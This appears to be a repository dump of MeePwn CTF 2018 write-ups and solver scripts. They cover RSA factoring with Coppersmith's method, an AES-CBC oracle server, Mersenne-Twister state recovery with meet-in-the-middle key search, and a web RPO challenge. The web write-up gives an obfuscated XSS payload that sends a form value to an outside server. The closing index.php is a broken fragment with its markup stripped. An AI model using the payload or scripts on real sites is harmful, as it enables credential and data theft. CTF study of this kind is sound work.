s1(gi): print '@s1@', gi tmp = solve_mod([x*(x+g+gi)==n2], 2^t2) for i in tmp: ii = int(i[0]) print '#s2#', ii f = y * (2^t2) + ii f1 = f.monic() res = f1.small_roots(X=2^t1,beta=0.3) if res: p = f(res[0]) print 'find p?', p if n%int(p) == 0: return p return None def s2(p1, q1): print '#s2#', p1, q1 tmp = solve_mod([(x+p1)*(x+q1)==n2], 2^t2) for i in tmp: ii = int(i[0]) if not hex(ii).strip('L').endswith('0000000000'): break print '$s3$', ii f = y * (2^t2) + ii + p1 f1 = f.monic() res = f1.small_roots(X=2^t1,beta=0.3) if res: p = f(res[0]) print 'find p?', p raw_input() if n%int(p) == 0: return p return None # for i in xrange(-2400, -1600): for i in xrange(-472, -471): test = s1(i) ''' if not test: continue for q0 in test: # assert q0 == q&m1 p0 = int((q0+g+i)%(2^t1)) res = s2(p0, q0) ''' if test: print 'hahaha', test raw_input() ================================================ FILE: 2018/meepwn-quals-2018/crypto/esor/exp.py ================================================ __author__ = "polaris" from Crypto.Cipher import AES encrypt_key = '\xff' * 32 hmac_secret = '' blocksize = 16 hmac_size = 20 data = "29181366df90e89ad5860e2f8e8370658d963ba0f5ebc45bbe31069b3c5fc944b1d7852fdc73683cc029e8a749a5a6e7cfc3bce037d5e77f9cb23c8629628926ed3aef3587b73d00d3923b0ed4a183357eef2744ed282e62b85ce2d36a0b6142" data = data.decode('hex') iv = data[:blocksize] _aes = AES.new(encrypt_key, AES.MODE_CBC, iv) data = _aes.decrypt(data[blocksize:]) print data ================================================ FILE: 2018/meepwn-quals-2018/crypto/esor/server.py ================================================ #!/usr/bin/python2 from Crypto.Cipher import AES import hmac, hashlib import os import sys menu = """Choose one: 1. encrypt data 2. decrypt data 3. quit """ class Unbuffered(object): def __init__(self, stream): self.stream = stream def write(self, data): self.stream.write(data) self.stream.flush() def __getattr__(self, attr): return getattr(self.stream, attr) sys.stdout = Unbuffered(sys.stdout) sys.stderr = None encrypt_key = '\xff' * 32 secret = 'MeePwnCTF{#flag_here#}' hmac_secret = '' blocksize = 16 hmac_size = 20 def pad(msg): padlen = blocksize - (len(msg) % blocksize) - 1 return os.urandom(padlen) + chr(padlen) def unpad(msg): return msg[:-(ord(msg[-1]) + 1)] def compute_hmac(msg): return hmac.new(hmac_secret, msg, digestmod=hashlib.sha1).digest() def encrypt(prefix='', suffix=''): _enc = prefix + secret + suffix _enc+= compute_hmac(_enc) _enc+= pad(_enc) iv = os.urandom(16) _aes = AES.new(encrypt_key, AES.MODE_CBC, iv) return (iv + _aes.encrypt(_enc)).encode('hex') def decrypt(data): data = data.decode('hex') try: iv = data[:blocksize] _aes = AES.new(encrypt_key, AES.MODE_CBC, iv) data = _aes.decrypt(data[blocksize:]) data = unpad(data) plaintext = data[:-hmac_size] mac = data[-hmac_size:] if mac == compute_hmac(plaintext): return True else: return False except: return False print """Welcome to our super secure enc/dec server. We use hmac, so, plz don't hack us (and you can't). Thanks.""" while True: choice = int(raw_input(menu)) if choice == 1: _pre = raw_input('prefix: ') _suf = raw_input('suffix: ') print encrypt(prefix=_pre, suffix=_suf) elif choice == 2: _data = raw_input('data: ') if decrypt(_data): print 'OK' else: print 'KO' elif choice == 3: sys.exit(0) else: choice = int(raw_input(menu)) ================================================ FILE: 2018/meepwn-quals-2018/crypto/old_school/README.md ================================================ # Writeup * part 1 —— use yafu, `fermat(n, 10000000)` * part 2 —— hex(n), find that n = (a\*(2^1000)+b) * (c\*(2^1000)+d) * part 3 —— find a valid `tmp` and deduce the values of `randint` ```sage nn = 139713689065649193238602077859960857468098993135221000039102730899547298927683962573562384690733560045229965690142223836971463635696618075169874035306125645096696682021038045841133380609849851790395591047968701652975799368468556274243238594974251982826875184190103880810901174411829635180158201629467635591810569775155092318675639049754541256014635438864801255760305914815607547032463796789980267388517787537827413511219215383011915710116907720461035152786018808394261912036183662986050428253151429051345333273081222126466016921456969903177087878715836995228953335073770833282613911892360743789453583070756075529298371748549 tmp = isqrt(nn//1337//7331) - (2^(512+1))//7331 res = nn - tmp*tmp*1337*7331 # print p-1337*tmp # print q-7331*tmp a = res % tmp b = res // tmp print 'mul', a print 'add', b, int(b).bit_length() var('x, y') gg = solve([x*y==a, 7331*x+1337*y==b], x, y) print gg ``` ================================================ FILE: 2018/meepwn-quals-2018/crypto/old_school/part_1.txt ================================================ n = 12263815858436391339801252716055343215721551207190585812808883921492616938019767754888047221243921529199781329682187336097470283133260860905444173937906698593993435816362355791049334301256672146334457160396157422171213155186704409015520723701624704179794619860512757194475928285433621469983215042163268337482613981138412642113164161985610041212644438310461087934752877418645890869616237437302541973412868157911349542527624597832254480191497600938121405413426358837072839977429474448232347107365820912432960433009928432513624193587173708951345864949412064817411473475077328080824358689398099979260395549956349458200199 e = 65537 c = 10768566524581730417282966534533772232170128646105592645274840624344800039953305762328123247486367933169410426551021676301441508080687130308882531249672782247453418751384028303096785698132140306753136583313099836328879191020815311025909775009768461235238724055399564994913948731120265357427622567179898229336239135361607806956357971819975387160453721508112358768552880424521729959498368682405606641964356553284372394601190105374421489502575623037672340535664494377154727704978673190317341737416683547852588813171964475428949505648909852833637140722157843587170747890226852432960545241872169453977768278393240010335066 ================================================ FILE: 2018/meepwn-quals-2018/crypto/old_school/part_2.txt ================================================ n = 32317007997554674385349615891817642773386605194812774888699399085196191794571384182422952167619837501795723538528931327159587983358628859504590723914892119478718126207089276060309706774425448653115310296039404328801754660372655218697443296169226536829110407154367147778475282279643613957212146771061477882859160052927335260673353787015976402719590523208336436450340211718238793469564080171762430651352930734689263596836122378167570929701725793689221407150157994038959493338968844604240687047300165564661354163479888199791831857521168174860532936751952480913605385678113510666108924260168617210436143153585499118186433 e = 65537 c = 3276317031877048034921689870842067102082984132116094274739382394942015587590724787158982350802646840240494972561882263073240227808400607161162982258260014527796718342988907758893432031368754237249396935435825620816173572853468606403492532489569016730369554744690415453811865812653908391295808987211722639212793730193965857595902086835233937795612266373947212176592539984179545181633416734531184100728289921617009799700655919616113513377725551467929505260502666912513988565860061157100733206213776142272254528206526835704772005607585391210115528195828817631620260680401489038612476650344781706860508085522520661975350 ================================================ FILE: 2018/meepwn-quals-2018/crypto/old_school/part_3.txt ================================================ ''' sage: tmp.nbits() 1024 sage: p = next_prime(1337*tmp + randint(2, 2**512)) sage: q = next_prime(7331*tmp + randint(2, 2**512)) sage: n = p * q ''' n = 139713689065649193238602077859960857468098993135221000039102730899547298927683962573562384690733560045229965690142223836971463635696618075169874035306125645096696682021038045841133380609849851790395591047968701652975799368468556274243238594974251982826875184190103880810901174411829635180158201629467635591810569775155092318675639049754541256014635438864801255760305914815607547032463796789980267388517787537827413511219215383011915710116907720461035152786018808394261912036183662986050428253151429051345333273081222126466016921456969903177087878715836995228953335073770833282613911892360743789453583070756075529298371748549 e = 65537 c = 124685720137286087974637083454831701339966293804422893085596270389405855619404156520743766929373287868106538299589424038783043194334560243812640561592652200368376115611247891237635032352102375266455486004707355213472127905734695141272493858057378951812357840535403155691798886254882859468912066573675006464518263526982997249121158520551576258448776707985773899806354192979203812074933169737618274419084890323034162520302687449736028470908248699174457011959674081295825304524826030316907668167104468182549336009917924574890737992068942209504351840515837871695539713067102504739121645006079782283023187240752494388988784497294 ================================================ FILE: 2018/meepwn-quals-2018/crypto/still_old_school/README.md ================================================ # Writeup 1. use 156 ivs to get the state of `python Random` 2. reverse the Mersenne-twister algo and get the previous rand ints 3. calculate the value of `random()` in `gen_key` 4. get the value of mask1 and mask2 by mitm 5. get flag ================================================ FILE: 2018/meepwn-quals-2018/crypto/still_old_school/aes_server.py ================================================ from secret import flag, mask1, mask2 import string import random import sys import os import signal import hashlib from Crypto.Cipher import AES menu = """ CHOOSE 1 OPTION 1. Encrypt message 2. Decrypt message 3. Get encrypted flag 4. Exit\n """ sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) bs = 16 def to_string(num, max_len = 128): tmp = bin(num).lstrip('0b')[-max_len:].rjust(max_len, '0') return "".join(chr(int(tmp[i:i+8], 2)) for i in range(0, max_len, 8)) def pad(s): padnum = bs - len(s) % bs return s + padnum * chr(padnum) def unpad(s): return s[:-ord(s[-1])] def gen_key(mask): tmp1 = random.random() tmp2 = random.random() key = int(tmp1 * 2**128) | int(tmp2 * 2**75) | (mask & 0x3fffff) key = to_string(key) return key def encrypt_msg(msg, key1, key2): iv = to_string(random.getrandbits(128)) aes1 = AES.new(key1, AES.MODE_CBC, iv) aes2 = AES.new(key2, AES.MODE_CBC, iv) enc = aes1.encrypt(aes2.encrypt(pad(msg))) return (iv + enc).encode("hex") def proof_of_work(): """ This function has very special purpose :)) Simply to screw you up """ prefix = to_string(random.getrandbits(64), 64) print 'prefix = {}'.format(prefix.encode('hex')) challenge = raw_input('> ') tmp = hashlib.sha256(prefix + challenge).hexdigest() if tmp.startswith('00000'): return True else: return False key1 = gen_key(mask1) key2 = gen_key(mask2) signal.alarm(300) if not proof_of_work(): exit(0) for _ in range(256): print menu try: choice = int(raw_input("> ")) except: print "wrong option" exit(-1) if choice == 1: msg = raw_input("give me a string: ") print encrypt_msg(msg, key1, key2) elif choice == 2: print "Not implement yet..." elif choice == 3: print encrypt_msg(flag, key1, key2) elif choice == 4: exit(-1) else: print "wrong option" exit(-1) ================================================ FILE: 2018/meepwn-quals-2018/crypto/still_old_school/mid.py ================================================ #!/usr/bin/env python # coding=utf-8 from Crypto.Cipher import AES m = 'aaaaaaaaaaaaaaaa' # iv = 'a208b2b4875dd0d3f00d84ef7edfea9e'.decode('hex') iv = '0d18512b8241843f698ee00e6ed78938'.decode('hex') # c = '258379d4897190e38de2cd68dfbe9f20'.decode('hex') c = ('7939112a9ebb4edf17b18562d99e0bb9b86ca4f8213c290bc7fdc41fa8f23d60')[:32].decode('hex') def mid(pre1, pre2): keymap = {} max_n = 0x3fffff for i in xrange(max_n): if i & 0xffff == 0: print hex(i) key2 = format(pre2+i, '032x').decode('hex') aes2 = AES.new(key2, AES.MODE_CBC, iv) tmp = aes2.encrypt(m) keymap[tmp] = key2 print 'step1 ok' for i in xrange(max_n): if i & 0xffff == 0: print hex(i) key1 = format(pre1+i, '032x').decode('hex') aes1 = AES.new(key1, AES.MODE_CBC, iv) tmp = aes1.decrypt(c) if keymap.has_key(tmp): print 'key1', repr(key1) print 'key2', repr(keymap[tmp]) return key1, key2 if __name__ == '__main__': # pre1 = 0xc2c82355515255bea700d1881f400000L # pre2 = 0x5dbbe248e1e5c50e1510f1e994c00000L pre1 = 11237954972221133508252466142586601472 pre2 = 137653991910236467477613808499415842816 print mid(pre1, pre2) ================================================ FILE: 2018/meepwn-quals-2018/crypto/still_old_school/sock.py ================================================ #!/usr/bin/env python # coding=utf-8 from pwn import remote, log from hashlib import sha256 from itertools import product def enc(m='a'*16): r.sendlineafter('> ', '1') r.sendlineafter(': ', m) res = r.recvline().strip() return res[:32].decode('hex'), res[32:].decode('hex') def getflag(): r.sendlineafter('> ', '3') res = r.recvline().strip() return res[:32].decode('hex'), res[32:].decode('hex') def b2n(b): return int(b.encode('hex'), 16) ns = '1234567890' r = remote("206.189.32.108", 13579) tmp = r.recvline() log.info(tmp) pre = tmp[9:].strip() log.info(pre) for i in product(ns, repeat=10): ans = ''.join(i) if sha256(pre.decode('hex')+ans).hexdigest().startswith('00000'): log.info('find %s', ans) r.sendlineafter('> ', ans) break ''' iv, c = enc() log.info('iv: %s, %d', repr(iv), len(iv)) log.info('ctext: %s, %d', repr(c), len(c)) iv, c = enc() log.info('iv: %s, %d', repr(iv), len(iv)) log.info('ctext: %s, %d', repr(c), len(c)) ''' ivs = [int(pre, 16)] for i in range(156): print i iv, c = enc() ivs.append(b2n(iv)) with open('record', 'w') as f: f.write(str(ivs)) log.info('iv: %s, %d', iv.encode('hex'), len(iv)) log.info('ctext: %s, %d', c.encode('hex'), len(c)) iv, c = getflag() log.info('flag_iv: %s, %d', repr(iv), len(iv)) log.info('flag_ctext: %s, %d', repr(c), len(c)) ================================================ FILE: 2018/meepwn-quals-2018/web/grandline/README.md ================================================ # Grandline `Author: SYM01` There is a `RPO` problem in the website. When visit [http://178.128.6.184/3915ef41890b96cc883ba6ef06b944805c9650ee/index.php/{abc}/](http://178.128.6.184/3915ef41890b96cc883ba6ef06b944805c9650ee/index.php/{abc}/), the page will load the script from `http://178.128.6.184/3915ef41890b96cc883ba6ef06b944805c9650ee/index.php/{abc}/js/jquery.min.js`. The only thing we need to to is making that script evil. We simply replace the token `{abc}` with the following payload, then the evil script works and sends the flag to our server. ```txt */window.onload=function()%7Blocation=String.fromCharCode(104,116,116,112,58,47,47,51,53,46,50,48,55,46,52,46,50,51,47)%2Bdocument.querySelectorAll(String.fromCharCode(105,110,112,117,116))[1].value%7D;console.log(/* ``` So the final payload is ```url http://localhost/3915ef41890b96cc883ba6ef06b944805c9650ee/index.php/*/window.onload=function()%7Blocation=String.fromCharCode(104,116,116,112,58,47,47,51,53,46,50,48,55,46,52,46,50,51,47)%2Bdocument.querySelectorAll(String.fromCharCode(105,110,112,117,116))[1].value%7D;console.log(/*/ ``` --> `You are on new world, flag: MeePwnCTF{Welcome_to_New_World}` ================================================ FILE: 2018/meepwn-quals-2018/web/grandline/index.php ================================================ The Two piece Treasure "; ?>

GRAND LINE

Welcome to Grand Line, You are in the way to become Pirate King, now, let's defeat BigMom first


"; if ($loca === "127.0.0.1" || $loca==="::1") { echo ""; } else { echo ""; } ?>

If you eat fruit, you can't swim


Pirate, Let's go to your Grand Line

"; } else { echo "

You need to eat 'gomu gomu no mi'

"; } } ?>